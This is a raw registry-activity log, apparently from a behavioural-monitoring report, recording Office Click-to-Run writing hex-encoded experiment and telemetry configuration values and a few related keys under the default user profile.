Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.3 = 203a20227374643a3a77737472696e677c323032302d30342d32315430303a30303a30302b30303a303022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4c6963656e73696e672e456e61626c6547726163655769746857414350726f6d6f427573426172222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4c6963656e73696e672e456e61626c654d6f6465726e41464f222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4c6963656e73696e672e486561727462656174446179734265666f726545787044617465222c20225622203a2022696e7433325f747c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4c6963656e73696e672e4e6f456e7469746c656d656e747353656c6653657276696365222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4c6963656e73696e672e4e6f456e7469746c656d656e74735472794275794578706572696d656e7454726561746d656e74222c20225622203a2022696e7433325f747c3222207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4c6963656e73696e672e53686f77564e6578745369676e4f75744469616c6f67222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4c6963656e73696e672e5573655265666163746f726564436f6e666967446570726f766973696f6e222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4c6963656e73696e672e5573655265666163746f726564476574557365724c6963656e7365222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4d616e6167656162696c6974792e436c6f7564506f6c6963792e4e6f6e5075626c6963436c6f7564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4d616e6167656162696c6974792e54656e616e744173736f63696174696f6e4b65792e4e6f6e5075626c6963436c6f7564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4d616e6167656162696c6974792e5573654f637073563255726c496e57696e222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4e616e63794f66666963655465616d2e7a686574616e34313232303231222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e416c6c6f7741626f7274517569636b436865636b45777353657276696365222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e416c6c6f7741626f7274517569636b436865636b4f6d657853657276696365222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e4368616e6765476174652e496e766f6b6546657463684d616e696665737443616c6c6261636b4f6e446f776e6c6f61644d616e6966657374222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e4368616e6765476174652e557365436c6f6e6564496e7374616e6365466f724572726f72222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e4368616e6765476174652e56616c6964617465446f776e6c6f61645265736f7572636573222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e4469616c6f6754776f5761794d6573736167696e67222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e456e61626c654d696e43616368655265667265736820222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e4964656e746974794361636865466f72636552656672657368222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e4f7366496e7374616c6c6572526567697374657242675461736b222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e506572557365724964656e746974794d696e4361636865222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e506572557365724964656e74697479526962626f6e4361636865222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e5765624b69743246756c6c4469616c6f67415049222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f4d45582e456e61626c65456e7465727072697365436f6d416464696e536574436f6e6e656374496e7465726e616c5570646174654576656e7473222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f4d45582e456e61626c65456e7465727072697365436f6d416464696e556e68616e646c6564457863657074696f6e4576656e7473222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f6172742e456e61626c65496e736572744d6564696154656c656d65747279222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f6e654e6f74652e4170706c652e43576f726b73706163655573657255736555726c46726f6d526177556e69636f6465537472696e67222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f6e654e6f74652e4368616e6765476174652e53686f77494150456e747279222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f6e654e6f74652e44656570426174636853746f7265456e61626c6564222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f6e654e6f74652e52656e6465725570646174656457696e333252656458222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f6e654e6f74652e53686f756c645573654e6574436f7374496e73746561644f664d736f426c6f636b696e67222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f75746c6f6f6b2e4c6173744d696c6554656c656d6574727954726163657274222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f75746c6f6f6b2e5063782e4c696e6b6564496e4b32466978222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f75746c6f6f6b2e5063782e5063784a756e65323031394275674669786573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f75746c6f6f6b2e526970636f72642e33363134383230222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f75746c6f6f6b2e526970636f72642e33393039323635222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f75746c6f6f6b2e526970636f72642e33393435323833222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5043582e526970636f72642e56534f2e33363432383036222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506572666f726d616e63652e426c6f636b696e6757616974732e4f737250726f63657373222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506572666f726d616e63652e4368616e6765476174652e586c426f6f74436f6d706c657465416674657246696c654f70656e416e6453706c61736853637265656e222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506572736f6e616c697a6174696f6e2e456e61626c65476574496e736967687473222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506572736f6e616c697a6174696f6e2e456e61626c6553656e645369676e616c222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506572736f6e616c697a6174696f6e2e47657455736572466163747354696d656f75744d696c6c697365636f6e6473222c20225622203a2022696e7433325f747c3530303022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506572736f6e616c697a6174696f6e2e557365476574496e736967687473466c6f77466f724665746368696e67476f7665726e616e636544617461222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506f776572506f696e742e4368616e6765476174652e436865636b56696577496e536c6964654a616e69746f724f62736572766572222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506f776572506f696e742e4368616e6765476174652e466f726365536f6674776172654d696e69617475726552656e646572696e67222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506f776572506f696e742e4368616e6765476174652e4d657267652e5573655468726f77696e674c69666567756172645374657073222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506f776572506f696e742e4368616e6765476174652e536c69646553686f772e52656c65617365536c69646553686f774d616e616765724265666f726547667853687574646f776e222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506f776572506f696e742e48616e646c65434c524372617368222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506f776572506f696e742e53756767657374696f6e732e456e61626c65436f6e74656e745265636f6d6d656e646174696f6e4974656d73222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e50726f6a6563742e50726f6a65637443325253657276657232303133436f6e6e656374696f6e426c6f636b222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e50726f6a6563742e50726f6a65637443656e74656e6e69616c53657276657232303133426c6f636b222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e50726f6a6563742e50726f6a65637443656e74656e6e69616c53657276657232303133436f6e6e656374696f6e426c6f636b222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e53656375726974792e434c502e5570646174655374617475734261724f6e50726f66696c65537769746368222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e53656375726974792e43656e7472616c697a6564457874656e73696f6e536166657479436865636b222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e53656375726974792e49524d2e5758505644697361626c654c6f616454656d706c617465734f6e426f6f74222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e53656375726974792e4973457874656e73696f6e496e4c697374557064617465222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e53656375726974792e4d6f6e69746f72656446696c65457874656e73696f6e4c697374222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e53656375726974792e50726f74656374696f6e536572766963652e4e657755784d6f64656c222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e53656375726974792e53686f756c6452756e436c6f75645365637572697479506f6c696379436865636b222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e53656375726974792e5573654e6f526566436f756e74416d736953747265616d222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5365676d656e746174696f6e2e436c6f7564222c20225622203a20227374643a3a77737472696e677c5075626c696322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5365676d656e746174696f6e2e46617374465445222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5365676d656e746174696f6e2e4d53495442697a63686174416c6c6f776c697374222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5365676d656e746174696f6e2e4d6f636861222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5365676d656e746174696f6e2e4f584f416c6c222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5365676d656e746174696f6e2e50657270657475616c4c6963656e7365222c20225622203a20227374643a3a77737472696e677c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5365676d656e746174696f6e2e5365676d656e74222c20225622203a20227374643a3a77737472696e677c4e4f4e4652444322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5365676d656e746174696f6e2e56657273696f6e506172746974696f6e222c20225622203a20227374643a3a77737472696e677c57696e3332416e64726f6964486f7422207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5365676d656e746174696f6e2e576f7264436f70696c6f74446f67666f6f64222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e416c6c6f775a65726f4c656e677468536561726368537472696e67222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4175746f436f727265637455492e41637469766974696573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4175746f446973636f7665722e4275674669786573466f7252657472794661696c65645265717565737473222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4175746f446973636f7665722e4c696d6974546f4f6e654175746f446973636f766572222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4175746f446973636f7665722e4f6e6c795573654874747073222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e426f6f7449646c655468726f74746c6572222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4275674669782e506572736f6e61436f6e74726f6c4261636b67726f756e64436f6c6f72222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4368616e6765476174652e44656c617943757272656e745549416374697665506c616365557064617465222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4372634261736564556964222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e43726974697175652e44697361626c65644c616e677561676573222c20225622203a20227374643a3a77737472696e677c6a612c7a6822207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e43726974697175652e4c6f67496e7465726e616c4e616d65416e645072696f72697479222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e456469746f72536572766963652e557365496e737472756d656e746174696f6e417069222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772616d6d6172436865636b696e672e4765726d616e456e744469736162696c69747942696173222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|4" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.11 = 41707056616c75655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657450726f6475637456616c75655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2253686f756c645573654d6963726f736f66743336354272616e64696e675c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c2254656e616e745c22203a207b205c224576656e74735c22203a207b205c22496e697454656e616e7449645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224e756c5c22203a207b205c225375624e616d657370616365735c22203a207b205c22466574636865725c22203a207b205c224576656e74735c22203a207b205c224765744e756c4f626a656374466f724964656e746974795c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2246657463684d6f64656c46726f6d4f6c735c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224765744c6963656e73654665617475726573466f724964656e746974795c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2243726561746552657175657374426f64795c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224d6f64656c5c22203a207b205c224576656e74735c22203a207b205c224765744c6963656e736543617465676f72795c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22476574416c6c4c6963656e736543617465676f726965735c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22446573657269616c697a655c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c225061727365526177526573706f6e73655c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2243616e52756e46656174757265526573756c74735c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c224d6f64655c22203a207b205c224576656e74735c22203a207b205c224765744d6f64655c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c224170695c22203a207b205c224576656e74735c22203a207b205c22437265617465526571756573745c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2253656e64526571756573745c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2252656365697665526573706f6e73655c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c2253746f726167655c22203a207b205c224576656e74735c22203a207b205c2247657453746f72616765506174685c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224c6f61644d6f64656c735c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22476574556e766572696669656453746f72616765506174685c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224c6f61644d6f64656c5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2252656e616d6546696c65546f55736555706461746564486173685c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c2256616c69646174696f6e5c22203a207b205c224576656e74735c22203a207b205c22517569636b56616c69646174696f6e5c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c2256616c696461746f725c22203a207b205c224576656e74735c22203a207b205c224d61746368696e67486172776172656449645c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d207d207d2c205c22466c6f77735c22203a207b205c224576656e74735c22203a207b205c22536561726368466f72534341546f6b656e5c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4d6f786965222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74466c61675c22203a203438383936207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4f6666696365222c20225622203a20227374643a3a77737472696e677c7b205c224c6f636b65645c22203a2066616c73652c205c225375624e616d657370616365735c22203a207b205c224e61747572616c4c616e67756167655c22203a207b205c224c6f636b65645c22203a2066616c73652c205c225375624e616d657370616365735c22203a207b205c224372697469717565735c22203a207b205c224c6f636b65645c22203a2066616c73652c205c224576656e74735c22203a207b205c2250726f636573734175676c6f6f704372697469717565735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2250726f636573734175676c6f6f7041646443726974697175655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4f75746c6f6f6b222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c224465736b746f705c22203a207b205c225375624e616d657370616365735c22203a207b205c2253796e635c22203a207b205c224576656e74735c22203a207b205c2253796e6350757267654f66666c696e654974656d735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2256696577735c22203a207b205c224576656e74735c22203a207b205c224872566965774c6f6164436f6d706c657465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22566965774d6f64655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e506572736f6e616c697a6174696f6e222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c2246696c65496e736967687443616368654d616e616765725c22203a207b205c224576656e74735c22203a207b205c2250757267654578706972656443616368655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c225369676e616c50726f636573736f725c22203a207b205c224576656e74735c22203a207b205c2253656e645369676e616c5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e50726f6772616d6d6162696c697479222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c2254656c656d657472795c22203a207b205c224576656e74735c22203a207b205c22446e61416464496e4c6f6164586c6c46696c655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446e61416464496e4c6f616445787465726e616c446c6c5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446e61416464496e4c6f6164446e6146696c655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22416464696e43726173685c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22416464696e735c22203a207b205c224576656e74735c22203a207b205c22417070416464496e4c6f61645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22417070416464496e55736167655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22416464696e446f634c6f61645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e7465726e616c536574436f6e6e6563745c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e5365637572697479222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c22436c70547279557067726164654c6162656c4661696c7572655c22203a207b205c224576656e74466c61675c22203a203438383936207d207d2c205c225375624e616d657370616365735c22203a207b205c22436c705c22203a207b205c224576656e74735c22203a207b205c224c6162656c55736167655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224f7574636f6d6555736167655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224f66666963654a534765744c6162656c44657461696c735c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22436c70506f6c696379466574636843616c6c4261636b537563636573735c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224d616e6461746f72794c6162656c6c696e674469616c6f675c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224f626a6563744d6f64656c4765744c6162656c5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224f626a6563744d6f64656c5365744c6162656c5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224f626a6563744d6f64656c506f6c696379436f6d706c657465496e697469616c697a655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2253656c6563744a757374696669636174696f6e4f7074696f6e5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2253656e7369746976697479466c796f7574416e63686f72547261636b416e645265766f6b65427574746f6e436c69636b5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c225265676973746572446f63756d656e745c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2246657463684c6162656c7346726f6d5365727665725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657444656661756c744c6162656c49445c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765744c6162656c735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765744f7574636f6d6573466f724c6162656c4368616e67655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2250726f6365737341756469744f6e506f6c6963794d617463685c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2250726f6365737341756469744f6e5265706c79466f72776172645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2250726f6365737341756469744f70656e48656c7065725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765744175646974496e666f506f6c6963794d617463685c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765744175646974496e666f4c6162656c416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765744175646974496e666f46696c65416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c6162656c696e67457870657269656e63655c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224164644c6162656c4f627365727665725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2252656d6f76654c6162656c4f627365727665725c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c22436c705c22203a207b205c224576656e74735c22203a207b205c22446b6550726f746563746564436f6e74656e745c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d207d207d2c205c224d6163726f5c22203a207b205c224576656e74735c22203a207b205c22426c6f636b4d6163726f46726f6d496e7465726e6574506f6c69637953657474696e675c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22456e636f756e74657265645c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22456e61626c65645c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c2246696c65426c6f636b5c22203a207b205c224576656e74735c22203a207b205c2246696c65426c6f636b496e666f726d6174696f6e5c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c224f43585c22203a207b205c224576656e74735c22203a207b205c2254727573746564456e636f756e7465725c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224e6f6e54727573746564456e636f756e7465725c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22416363657373456e636f756e7465725c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c22426c6f636b6564657874656e73696f6e735c22203a207b205c224576656e74735c22203a207b205c2246696c65457874656e73696f6e4c69737446726f6d536572766963655c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c22536563757265526561646572486f73745c22203a207b205c224576656e74735c22203a207b205c224f70656e496e4f53525c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e54617267657465644d6573736167696e67222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c224275736261725468656d6553656c656374696f6e5374617475735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e54656c656d65747279222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c22436c69656e7453616d706c696e674f76657272696464656e5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2253797374656d4865616c74684d657461646174614e6574776f726b436f73745c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224576656e7451756172616e74696e65645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c6f6164586d6c52756c65735c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2250726f6365737349646c6551756575654a6f625c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22466c7573684576656e744275666665725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2254656c656d6574727953656e74696e656c56616c75655c22203a207b205c224576656e74466c61675c22203a2030207d207d2c205c224c6f636b65645c22203a2066616c7365207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e54656c6c4d65222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c2254656c6c4d655741435c22203a207b205c224576656e74735c22203a207b205c225175657279526573706f6e73655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e54657874222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c225265736f75726365436c69656e745c22203a207b205c224576656e74735c22203a207b205c22446573657269616c697a655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2252656164466f6e74456c656d656e74735c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2250757267654d756c7469706c655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22526561645265736f757263654d657461446174615c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2257726974655265736f757263654d657461446174615c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22474449417373697374616e745c22203a207b205c224576656e74735c22203a207b205c225265676973746572436c6f7564466f6e7443616c6c6261636b5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2248616e646c6543616c6c6261636b5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22466f6e744d616e6167657244657374727563746f725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22416464436c6f7564466f6e745265736f757263655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22466f6e74537562737469747574696f6e5c22203a207b205c224576656e74735c22203a207b205c22436f6c6c656374466f6e74537562737469747574696f6e55736167655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e5472616e736c61746f72222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c2220 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}\DeviceId = "0018000E55B401FA" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "2" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
